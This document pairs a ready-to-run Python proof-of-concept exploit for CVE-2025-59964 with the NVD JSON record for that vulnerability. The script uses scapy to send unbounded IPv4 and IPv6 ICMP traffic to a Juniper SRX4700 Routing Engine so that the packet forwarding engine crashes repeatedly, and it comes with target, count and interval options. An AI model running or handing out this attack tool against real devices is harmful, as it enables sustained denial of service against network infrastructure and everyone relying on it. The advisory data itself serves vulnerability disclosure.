CVE-2025-59964

# CVE-2025-59964 PoC - Juniper Junos OS SRX4700 PFE DoS # Vulnerability: Use of Uninitialized Resource in PFE when forwarding-options sampling is enabled # Target: Juniper SRX4700 running Junos OS 24.4 before 24.4R1-S3 or 24.4R2 # Prerequisites: forwarding-options sampling must be enabled on the target device # Impact: FPC crash and restart, sustained Denial of Service #!/usr/bin/env python3 import scapy.all as scapy import argparse import time import sys def send_traffic_to_re(target_ip, count=0, interval=0.01): """ Send network traffic destined to the Routing Engine (RE) of the target SRX4700 device. When forwarding-options sampling is enabled, this triggers the uninitialized resource vulnerability in the PFE, causing FPC crash and restart. """ print(f"[*] Targeting Juniper SRX4700 RE at: {target_ip}") print(f"[*] Sending traffic to trigger PFE uninitialized resource vulnerability...") print(f"[*] Attack vector: Continuous traffic destined to RE") packet_count = 0 try: while True: # Craft IPv4 packet destined to the RE pkt_v4 = scapy.IP(dst=target_ip) / scapy.ICMP() scapy.send(pkt_v4, verbose=False) # Craft IPv6 packet destined to the RE (vulnerability also affects IPv6) pkt_v6 = scapy.IPv6(dst=target_ip) / scapy.ICMPv6EchoRequest() scapy.send(pkt_v6, verbose=False) packet_count += 2 if packet_count % 100 == 0: print(f"[+] Sent {packet_count} packets...") if count > 0 and packet_count >= count: break time.sleep(interval) except KeyboardInterrupt: print(f"\n[*] Stopped after sending {packet_count} packets") sys.exit(0) if __name__ == "__main__": parser = argparse.ArgumentParser(description="CVE-2025-59964 PoC - Juniper SRX4700 PFE DoS") parser.add_argument("-t", "--target", required=True, help="Target SRX4700 RE IP address") parser.add_argument("-c", "--count", type=int, default=0, help="Number of packets to send (0 = infinite)") parser.add_argument("-i", "--interval", type=float, default=0.01, help="Interval between packets") args = parser.parse_args() send_traffic_to_re(args.target, args.count, args.interval)

{"cve": {"id": "CVE-2025-59964", "sourceIdentifier": "[email protected]", "published": "2025-10-09T16:15:46.443", "lastModified": "2026-01-23T18:36:49.490", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A Use of Uninitialized Resource vulnerability in the Packet Forwarding Engine (PFE) of Juniper Networks Junos OS on SRX4700 devices allows an unauthenticated, network-based attacker to cause a Denial of Service (DoS).\n\nWhen forwarding-options sampling is enabled, receipt of any traffic destined to the Routing Engine (RE) by the PFE line card leads to an FPC crash and restart, resulting in a Denial of Service (DoS). \n\nContinued receipt and processing of any traffic leading to the RE by the PFE line card will create a sustained Denial of Service (DoS) condition to the PFE line card.\n\n\nThis issue affects Junos OS on SRX4700: \n\n\n\n * from 24.4 before 24.4R1-S3, 24.4R2\n\n\nThis issue affects IPv4 and IPv6."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:L/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:Y/R:A/V:C/RE:M/U:Green", "baseScore": 8.7, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "LOW", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "YES", "Recovery": "AUTOMATIC", "valueDensity": "CONCENTRATED", "vulnerabilityResponseEffort": "MODERATE", "providerUrgency": "GREEN"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-908"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:juniper:junos:24.4:-:*:*:*:*:*:*", "matchCriteriaId": "C452BDCB-34E3-42D3-8909-2312356EB70A"}, {"vulnerable": true, "criteria": "cpe:2.3:o:juniper:junos:24.4:r1:*:*:*:*:*:*", "matchCriteriaId": "2B8158F2-2028-40E9-955F-CFD581A32F60"}, {"vulnerable": true, "criteria": "cpe:2.3:o:juniper:junos:24.4:r1-s2:*:*:*:*:*:*", "matchCriteriaId": "1A7233A1-EC7A-4458-9AE1-835480A03A21"}, {"vulnerable": true, "criteria": "cpe:2.3:o:juniper:junos:24.4:r2:*:*:*:*:*:*", "matchCriteriaId": "0EEF1798-F3C2-4645-96E7-1E82368B184D"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:juniper:srx4700:-:*:*:*:*:*:*:*", "matchCriteriaId": "462CFD52-D3E2-4F7A-98AC-C589D2420556"}]}]}], "references": [{"url": "https://supportportal.juniper.net/JSA103153", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://www.juniper.net/documentation/us/en/software/junos/cli-reference/topics/ref/statement/sampling-edit-forwarding-options.html", "source": "[email protected]", "tags": ["Technical Description"]}]}}